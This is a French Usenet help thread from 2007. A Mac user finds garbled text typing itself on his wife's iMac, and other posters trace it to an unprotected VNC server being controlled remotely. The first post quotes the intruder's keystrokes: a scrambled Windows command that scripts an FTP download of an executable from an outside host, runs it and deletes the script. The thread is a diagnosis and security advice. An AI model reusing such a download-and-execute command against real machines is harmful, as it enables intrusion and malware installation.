message étrange apparaissant tout seul

pmanet
en mode traitement de texte (neo office ou textedit), l'ordinateur de
mon épouse (iMac G4 15" macOSX 10.4.8) se met parfois à écrire tout
seul.
ça commence généralement comme ça :

(syste,root(`syste,"é`c,d:exe
c,d =c echo open ftpw:redirect,e:net é& :: ik èecho user jqs jqs :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

del ij èuz:exe ènet stqrt shqredqccess èexit

j'ai éteint Airport, débranché le réseau, ça continue...
il me semble reconnaitre des bouts de langage structuré, mais je ne vois
pas d'où ça peut venir.
elle n'a ni word ni Excel, mais plein de copines qui lui envoient toutes
les m... possibles.
Ma seule piste est que depuis quelques temps, son disque de démarrage
était saturé de chez saturé, il est meme descendu à 1,6 MO de libre
(depuis, on a nettoyé)

des idées ?

--
Philippe Manet

blanc
Olivier Croquette wrote:

C'est le minimum. A ça on peut ajouter:

- lancer le serveur à la main seulement quand c'est nécessaire

- changer le port sur lequel il écoute

et passer par ssh. Mais c'est vrai que c'est un peu plus acrobatique.

JPaul.
--
/==/==- Jean-Paul BLANC
/ /--/--// quelque-part (somewhere)
|/| L | en (in)
/|| = ||| FRANCE

pmanet
Patrick B wrote:

Faut vite mettre un mot de passe à ton VNC ! il est ouvert à tous les
vents !!!

le VNC est fermé depuis 48h et ça continue.
je pense plutot à une librairie qui a souffert à un moment où la place
dispo sur le disque était de 0 ko, et qui mime/empiète sur le clavier.
Une reinstal va etre difficile sauf effacement du volume (pas assez de
place dispo).
--
Philippe Manet

Nina Popravka
On Wed, 28 Mar 2007 00:38:10 +0200, (manet) wrote:

le VNC est fermé depuis 48h et ça continue.

NON.
Cet après midi l'écran de la machine de ta femme était parfaitement
accessible.
--
Nina

pmanet
Nina Popravka wrote:

Ah ouais tiens, on n'a plus la vue panoramique sur l'écran de la
bécane de la certainement très charmante Anne.

c'est vrai qu'elle aurait au moins pu mettre un mot de passe... pffffff

bon, là, j'ai coupé le routeur, ça ira mieux.

donc je peux en conclure qu'un script kiddy essayait depuis des semaines
de lui plomber sa machine sans finalement arriver à faire trop de
dégats.

--
Philippe Manet

pmanet
Nina Popravka wrote:

Cet après midi l'écran de la machine de ta femme était parfaitement
accessible.

c'est vrai qu'elle rebranchait son cable réseau pour se connecter à ses
mail, sans le débrancher ensuite...
--
Philippe Manet

patpro ~ Patrick Proniewski
In article <1hvnscj.znhjyn18masfrN%,
(JPaul) wrote:

Olivier Croquette wrote:

C'est le minimum. A ça on peut ajouter:

- lancer le serveur à la main seulement quand c'est nécessaire

- changer le port sur lequel il écoute

et passer par ssh. Mais c'est vrai que c'est un peu plus acrobatique.

et le Firewall c'est pas fait pour décorer, ça permet aussi de limiter
les accès à certaines IP...

patpro

--
http://www.patpro.net/